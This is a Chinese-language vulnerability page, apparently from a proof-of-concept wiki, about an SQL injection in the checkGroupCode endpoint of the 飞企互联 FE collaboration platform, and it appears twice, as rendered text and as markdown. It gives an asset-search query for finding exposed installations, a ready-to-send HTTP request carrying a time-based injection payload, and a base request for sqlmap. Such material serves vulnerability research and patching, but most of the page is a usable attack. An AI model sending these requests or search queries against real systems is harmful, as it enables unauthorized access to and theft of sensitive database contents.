fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台checkGroupCode存在SQL注入漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台checkGroupCode存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

POST /docexchangeManage/checkGroupCode.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=4B15C07393E691675DB622D9977C79FC
Content-Type: application/x-www-form-urlencoded

code=whoami11';WAITFOR DELAY '0:0:5'--

sqlmap

POST /docexchangeManage/checkGroupCode.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=4B15C07393E691675DB622D9977C79FC
Content-Type: application/x-www-form-urlencoded

code=whoami11

原文: https://www.yuque.com/xiaokp7/ocvun2/wgeact7c4fgurkgn

# 飞企互联FE业务协作平台checkGroupCode存在SQL注入漏洞

# 一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台checkGroupCode存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/kFB_oy79_FDZg1Fg/1699089816407-bde9e92a-e1f9-4241-bfde-6f8d413f338e-747838.png)

# 四、漏洞复现
```
POST /docexchangeManage/checkGroupCode.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=4B15C07393E691675DB622D9977C79FC
Content-Type: application/x-www-form-urlencoded

code=whoami11';WAITFOR DELAY '0:0:5'--
```
![image.png](./img/kFB_oy79_FDZg1Fg/1705070972946-02ca253a-8a75-4831-b81c-48f3a9896a87-851083.png)
sqlmap
```
POST /docexchangeManage/checkGroupCode.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=4B15C07393E691675DB622D9977C79FC
Content-Type: application/x-www-form-urlencoded

code=whoami11
```
![image.png](./img/kFB_oy79_FDZg1Fg/1705071002169-58b7649c-65e0-4817-8db8-c450d16aeb97-291411.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wgeact7c4fgurkgn>